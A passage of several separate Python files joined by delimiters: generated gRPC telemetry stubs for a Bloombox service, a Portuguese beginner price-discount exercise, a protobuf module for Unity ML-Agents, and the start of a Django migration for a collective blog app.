response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.Action = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry/Action',
request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Action.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class CommercialTelemetryServicer(object):
"""Provides support for tailored analytics payloads w.r.t. interactions between end-users and commercial models, like
menu sections, products, and user orders.
"""
def Impression(self, request, context):
"""Register that a menu section was presented to a user, regardless of whether they acted on it or not.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def View(self, request, context):
"""Register that a menu section was viewed, browsed-to, or otherwise served to a user.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Action(self, request, context):
"""Register that an end-user elected to take action within a section in some way.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_CommercialTelemetryServicer_to_server(servicer, server):
rpc_method_handlers = {
'Impression': grpc.unary_unary_rpc_method_handler(
servicer.Impression,
request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Impression.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'View': grpc.unary_unary_rpc_method_handler(
servicer.View,
request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.View.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'Action': grpc.unary_unary_rpc_method_handler(
servicer.Action,
request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.CommercialEvent.Action.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'bloombox.schema.services.telemetry.v1beta3.CommercialTelemetry', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
class IdentityTelemetryStub(object):
"""Provides support for recording telemetry information about user events and actions related to their own identity,
account, profile, preferences, and so on.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Action = channel.unary_unary(
'/bloombox.schema.services.telemetry.v1beta3.IdentityTelemetry/Action',
request_serializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.IdentityEvent.Action.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class IdentityTelemetryServicer(object):
"""Provides support for recording telemetry information about user events and actions related to their own identity,
account, profile, preferences, and so on.
"""
def Action(self, request, context):
"""Register affirmative action taken by an end-user on their own account or identity.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_IdentityTelemetryServicer_to_server(servicer, server):
rpc_method_handlers = {
'Action': grpc.unary_unary_rpc_method_handler(
servicer.Action,
request_deserializer=telemetry_dot_v1beta3_dot_TelemetryService__Beta3__pb2.IdentityEvent.Action.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'bloombox.schema.services.telemetry.v1beta3.IdentityTelemetry', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
"""Ex 012 - Faça um algoritimo que leia o preço de um produto e mostre seu novo preço,
com 5% de desconto."""
print('-' * 10, '>Ex 012,', '-' * 10)
#Criando variáveis e recebendo dados.
val_pro = float(input('Qual valor do produto: R$'))
desc = 0.05
novo_val_pro = val_pro - val_pro * desc
#imprimindo dados para o usuário na tela.
print('O valor do produto é de........: R${:.2f}'.format(val_pro))
print('O desconto dado é equivalente a: {:.0f}%'.format(desc * 100))
print('O valor final do produto é de..: R${:.2f}'.format(novo_val_pro)) |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: mlagents/envs/communicator_objects/unity_rl_input.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from mlagents.envs.communicator_objects import agent_action_pb2 as mlagents_dot_envs_dot_communicator__objects_dot_agent__action__pb2
from mlagents.envs.communicator_objects import environment_parameters_pb2 as mlagents_dot_envs_dot_communicator__objects_dot_environment__parameters__pb2
from mlagents.envs.communicator_objects import command_pb2 as mlagents_dot_envs_dot_communicator__objects_dot_command__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='mlagents/envs/communicator_objects/unity_rl_input.proto',
package='communicator_objects',
syntax='proto3',
serialized_pb=_b('\n7mlagents/envs/communicator_objects/unity_rl_input.proto\x12\x14\x63ommunicator_objects\x1a\x35mlagents/envs/communicator_objects/agent_action.proto\x1a?mlagents/envs/communicator_objects/environment_parameters.proto\x1a\x30mlagents/envs/communicator_objects/command.proto\"\xc3\x03\n\x11UnityRLInputProto\x12P\n\ragent_actions\x18\x01 \x03(\x0b\x32\x39.communicator_objects.UnityRLInputProto.AgentActionsEntry\x12P\n\x16\x65nvironment_parameters\x18\x02 \x01(\x0b\x32\x30.communicator_objects.EnvironmentParametersProto\x12\x13\n\x0bis_training\x18\x03 \x01(\x08\x12\x33\n\x07\x63ommand\x18\x04 \x01(\x0e\x32\".communicator_objects.CommandProto\x1aM\n\x14ListAgentActionProto\x12\x35\n\x05value\x18\x01 \x03(\x0b\x32&.communicator_objects.AgentActionProto\x1aq\n\x11\x41gentActionsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12K\n\x05value\x18\x02 \x01(\x0b\x32<.communicator_objects.UnityRLInputProto.ListAgentActionProto:\x02\x38\x01\x42\x1f\xaa\x02\x1cMLAgents.CommunicatorObjectsb\x06proto3')
,
dependencies=[mlagents_dot_envs_dot_communicator__objects_dot_agent__action__pb2.DESCRIPTOR,mlagents_dot_envs_dot_communicator__objects_dot_environment__parameters__pb2.DESCRIPTOR,mlagents_dot_envs_dot_communicator__objects_dot_command__pb2.DESCRIPTOR,])
_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO = _descriptor.Descriptor(
name='ListAgentActionProto',
full_name='communicator_objects.UnityRLInputProto.ListAgentActionProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='communicator_objects.UnityRLInputProto.ListAgentActionProto.value', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=511,
serialized_end=588,
)
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY = _descriptor.Descriptor(
name='AgentActionsEntry',
full_name='communicator_objects.UnityRLInputProto.AgentActionsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='communicator_objects.UnityRLInputProto.AgentActionsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='communicator_objects.UnityRLInputProto.AgentActionsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=590,
serialized_end=703,
)
_UNITYRLINPUTPROTO = _descriptor.Descriptor(
name='UnityRLInputProto',
full_name='communicator_objects.UnityRLInputProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='agent_actions', full_name='communicator_objects.UnityRLInputProto.agent_actions', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='environment_parameters', full_name='communicator_objects.UnityRLInputProto.environment_parameters', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='is_training', full_name='communicator_objects.UnityRLInputProto.is_training', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='command', full_name='communicator_objects.UnityRLInputProto.command', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO, _UNITYRLINPUTPROTO_AGENTACTIONSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=252,
serialized_end=703,
)
_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO.fields_by_name['value'].message_type = mlagents_dot_envs_dot_communicator__objects_dot_agent__action__pb2._AGENTACTIONPROTO
_UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO.containing_type = _UNITYRLINPUTPROTO
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY.fields_by_name['value'].message_type = _UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY.containing_type = _UNITYRLINPUTPROTO
_UNITYRLINPUTPROTO.fields_by_name['agent_actions'].message_type = _UNITYRLINPUTPROTO_AGENTACTIONSENTRY
_UNITYRLINPUTPROTO.fields_by_name['environment_parameters'].message_type = mlagents_dot_envs_dot_communicator__objects_dot_environment__parameters__pb2._ENVIRONMENTPARAMETERSPROTO
_UNITYRLINPUTPROTO.fields_by_name['command'].enum_type = mlagents_dot_envs_dot_communicator__objects_dot_command__pb2._COMMANDPROTO
DESCRIPTOR.message_types_by_name['UnityRLInputProto'] = _UNITYRLINPUTPROTO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
UnityRLInputProto = _reflection.GeneratedProtocolMessageType('UnityRLInputProto', (_message.Message,), dict(
ListAgentActionProto = _reflection.GeneratedProtocolMessageType('ListAgentActionProto', (_message.Message,), dict(
DESCRIPTOR = _UNITYRLINPUTPROTO_LISTAGENTACTIONPROTO,
__module__ = 'mlagents.envs.communicator_objects.unity_rl_input_pb2'
# @@protoc_insertion_point(class_scope:communicator_objects.UnityRLInputProto.ListAgentActionProto)
))
,
AgentActionsEntry = _reflection.GeneratedProtocolMessageType('AgentActionsEntry', (_message.Message,), dict(
DESCRIPTOR = _UNITYRLINPUTPROTO_AGENTACTIONSENTRY,
__module__ = 'mlagents.envs.communicator_objects.unity_rl_input_pb2'
# @@protoc_insertion_point(class_scope:communicator_objects.UnityRLInputProto.AgentActionsEntry)
))
,
DESCRIPTOR = _UNITYRLINPUTPROTO,
__module__ = 'mlagents.envs.communicator_objects.unity_rl_input_pb2'
# @@protoc_insertion_point(class_scope:communicator_objects.UnityRLInputProto)
))
_sym_db.RegisterMessage(UnityRLInputProto)
_sym_db.RegisterMessage(UnityRLInputProto.ListAgentActionProto)
_sym_db.RegisterMessage(UnityRLInputProto.AgentActionsEntry)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\252\002\034MLAgents.CommunicatorObjects'))
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY.has_options = True
_UNITYRLINPUTPROTO_AGENTACTIONSENTRY._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001'))
# @@protoc_insertion_point(module_scope)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-23 19:54
from __future__ import unicode_literals
import collective_blog.models.blog
import collective_blog.models.comment
import collective_blog.models.post
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import mptt.fields
import s_markdown.datatype
import s_markdown.extensions.autolink
import s_markdown.extensions.automail
import s_markdown.extensions.comment
import s_markdown.extensions.cut
import s_markdown.extensions.escape
import s_markdown.extensions.fenced_code
import s_markdown.extensions.semi_sane_lists
import s_markdown.extensions.strikethrough
import s_markdown.models
import s_markdown.renderer
import s_voting.models
import taggit.managers
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True, verbose_name='Name')),
('slug', models.SlugField(blank=True, editable=False, max_length=100, unique=True)),
('about', s_markdown.models.MarkdownField(blank=True, cls_name='about_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='about_renderer', verbose_name='About this blog')),
('_about_html', s_markdown.models.HtmlCacheField(blank=True, editable=False, markdown_field=s_markdown.models.MarkdownField(blank=True, cls_name='about_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='about_renderer', verbose_name='About this blog'), null=True)),
('icon', models.CharField(blank=True, choices=[('aircraft', 'aircraft'), ('aircraft-take-off', 'aircraft take off'), ('aircraft-landing', 'aircraft landing'), ('area-graph', 'area graph'), ('archive', 'archive'), ('attachment', 'attachment'), ('awareness-ribbon', 'awareness ribbon'), ('back-in-time', 'back in time'), ('bar-graph', 'bar graph'), ('beamed-note', 'beamed note'), ('bell', 'bell'), ('blackboard', 'blackboard'), ('book', 'book'), ('bowl', 'bowl'), ('bookmarks', 'bookmarks'), ('box', 'box'), ('briefcase', 'briefcase'), ('brush', 'brush'), ('bucket', 'bucket'), ('bug', 'bug'), ('cake', 'cake'), ('camera', 'camera'), ('chat', 'chat'), ('clapperboard', 'clapperboard'), ('classic-computer', 'classic computer'), ('clipboard', 'clipboard'), ('cloud', 'cloud'), ('code', 'code'), ('cog', 'cog'), ('colours', 'colours'), ('compass', 'compass'), ('database', 'database'), ('dial-pad', 'dial pad'), ('documents', 'documents'), ('feather', 'feather'), ('flag', 'flag'), ('flash', 'flash'), ('flashlight', 'flashlight'), ('flat-brush', 'flat brush'), ('flow-branch', 'flow branch'), ('flower', 'flower'), ('folder', 'folder'), ('info-with-circle', 'info with circle'), ('infinity', 'infinity'), ('image', 'image'), ('hand', 'hand'), ('hair-cross', 'hair cross'), ('grid', 'grid'), ('graduation-cap', 'graduation cap'), ('globe', 'globe'), ('lab-flask', 'lab flask'), ('landline', 'landline'), ('keyboard', 'keyboard'), ('key', 'key'), ('layers', 'layers'), ('laptop', 'laptop'), ('leaf', 'leaf'), ('lifebuoy', 'lifebuoy'), ('light-bulb', 'light bulb'), ('light-up', 'light up'), ('line-graph', 'line graph'), ('location-pin', 'location pin'), ('modern-mic', 'modern mic'), ('moon', 'moon'), ('mic', 'mic'), ('medal', 'medal'), ('mail', 'mail'), ('magnet', 'magnet'), ('mouse-pointer', 'mouse pointer'), ('mouse', 'mouse'), ('network', 'network'), ('palette', 'palette'), ('new-message', 'new message'), ('new', 'new'), ('newsletter', 'newsletter'), ('note', 'note'), ('paper-plane', 'paper plane'), ('phone', 'phone'), ('rocket', 'rocket'), ('radio', 'radio'), ('print', 'print'), ('price-tag', 'price tag'), ('shop', 'shop'), ('suitcase', 'suitcase'), ('tablet-mobile-combo', 'tablet mobile combo'), ('thunder-cloud', 'thunder cloud'), ('ticket', 'ticket'), ('time-slot', 'time slot'), ('tools', 'tools'), ('traffic-cone', 'traffic cone'), ('tree', 'tree'), ('tv', 'tv'), ('video-camera', 'video camera'), ('video', 'video'), ('vinyl', 'vinyl'), ('voicemail', 'voicemail'), ('wallet', 'wallet'), ('warning', 'warning'), ('water', 'water')], max_length=100)),
('type', models.CharField(choices=[('O', 'Open'), ('P', 'Private')], default='0', max_length=2, verbose_name='Type of the blog')),
('join_condition', models.CharField(choices=[('A', 'Anyone can join'), ('K', 'Only users with high karma can join'), ('I', 'Manual approval required')], default='A', max_length=2, verbose_name='Who can join the blog')),
('join_karma_threshold', models.SmallIntegerField(default=0, verbose_name='Join karma threshold')),
('post_condition', models.CharField(choices=[('A', 'Anyone can add posts'), ('K', 'Only users with high karma can add posts')], default='K', max_length=2, verbose_name='Who can add posts')),
('post_membership_required', models.BooleanField(default=True, verbose_name='Require membership to write posts')),
('post_admin_required', models.BooleanField(default=False, verbose_name='Only admins can write posts')),
('post_karma_threshold', models.SmallIntegerField(default=0, verbose_name='Post karma threshold')),
('comment_condition', models.CharField(choices=[('A', 'Anyone can comment'), ('K', 'Only users with high karma can comment')], default='A', max_length=2, verbose_name='Who can comment in the blog')),
('comment_membership_required', models.BooleanField(default=False, verbose_name='Require membership to write comments')),
('comment_karma_threshold', models.SmallIntegerField(default=0, verbose_name='Comment karma threshold')),
],
options={
'verbose_name_plural': 'Blogs',
'ordering': ('name',),
'verbose_name': 'Blog',
},
),
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='content_renderer', verbose_name='Comment')),
('_content_html', s_markdown.models.HtmlCacheField(blank=True, editable=False, markdown_field=s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.comment.CommentExtension()]), renderer_name='content_renderer', verbose_name='Comment'), null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('rating', s_voting.models.VoteCacheField(default=0, query=s_voting.models._default_cache_query, vote_model=collective_blog.models.comment.CommentVote)),
('is_hidden', models.BooleanField(default=False, verbose_name='Is hidden')),
('is_hidden_by_moderator', models.BooleanField(default=False, verbose_name='Is hidden by moderator')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='collective_blog.Comment')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CommentVote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vote', models.SmallIntegerField(choices=[(1, '+1'), (-1, '-1')])),
('object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes', to='collective_blog.Comment')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes_for_collective_blog_commentvote', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Membership',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('color', models.CharField(choices=[('gray', 'Gray'), ('black', 'Black'), ('blue', 'Blue'), ('orange', 'Orange'), ('purple', 'Purple'), ('marshy', 'Marshy'), ('turquoise', 'Turquoise'), ('red', 'Red'), ('yellow', 'Yellow'), ('green', 'Green')], default='gray', max_length=10)),
('role', models.CharField(choices=[('O', 'Owner'), ('M', 'Member'), ('B', 'Banned'), ('A', 'Administrator'), ('W', 'Waiting for approval'), ('L', 'Left the blog'), ('LB', 'Left the blog (banned)')], default='L', max_length=2)),
('ban_expiration', models.DateTimeField(default=django.utils.timezone.now)),
('can_change_settings_flag', models.BooleanField(default=False, verbose_name="Can change blog's settings")),
('can_delete_posts_flag', models.BooleanField(default=False, verbose_name='Can delete posts')),
('can_delete_comments_flag', models.BooleanField(default=False, verbose_name='Can delete comments')),
('can_ban_flag', models.BooleanField(default=False, verbose_name='Can ban a member')),
('can_accept_new_users_flag', models.BooleanField(default=False, verbose_name='Can accept new users')),
('can_manage_permissions_flag', models.BooleanField(default=False, verbose_name='Can manage permissions')),
('overall_posts_rating', s_voting.models.VoteCacheField(default=0, query=collective_blog.models.blog._overall_posts_rating_cache_query, vote_model=collective_blog.models.post.PostVote)),
('overall_comments_rating', s_voting.models.VoteCacheField(default=0, query=collective_blog.models.blog._overall_comments_rating_cache_query, vote_model=collective_blog.models.comment.CommentVote)),
('blog', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='collective_blog.Blog')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('heading', models.CharField(max_length=100, verbose_name='Title')),
('slug', models.SlugField(blank=True, editable=False, max_length=100, unique=True)),
('is_draft', models.BooleanField(default=True, verbose_name='Is draft')),
('content', s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), renderer_name='content_renderer', verbose_name='Content')),
('_content_html', s_markdown.models.HtmlCacheField(blank=True, editable=False, markdown_field=s_markdown.models.MarkdownField(cls_name='content_cls', default=s_markdown.datatype.Markdown(html='', renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), source=''), markdown=s_markdown.datatype.Markdown, renderer=s_markdown.renderer.BaseRenderer(extensions=['markdown.extensions.smarty', 'markdown.extensions.abbr', 'markdown.extensions.def_list', 'markdown.extensions.tables', 'markdown.extensions.smart_strong', s_markdown.extensions.fenced_code.FencedCodeExtension(), s_markdown.extensions.escape.EscapeHtmlExtension(), s_markdown.extensions.semi_sane_lists.SemiSaneListExtension(), s_markdown.extensions.strikethrough.StrikethroughExtension(), s_markdown.extensions.autolink.AutolinkExtension(), s_markdown.extensions.automail.AutomailExtension(), s_markdown.extensions.cut.CutExtension(anchor='cut')]), renderer_name='content_renderer', verbose_name='Content'), null=True)),
('created', models.DateTimeField(blank=True, editable=False, null=True)),
('updated', models.DateTimeField(auto_now=True)),
('rating', s_voting.models.VoteCacheField(default=0, query=s_voting.models._default_cache_query, vote_model=collective_blog.models.post.PostVote)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to=settings.AUTH_USER_MODEL, verbose_name='Author')),
('blog', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='collective_blog.Blog', verbose_name='Blog')),
],
options={
'verbose_name_plural': 'Posts',
'ordering': ('-created',),
'verbose_name': 'Post',
},
),
migrations.CreateModel(
name='PostVote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vote', models.SmallIntegerField(choices=[(1, '+1'), (-1, '-1')])),
('object', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='votes', to='collective_blog.Post')),
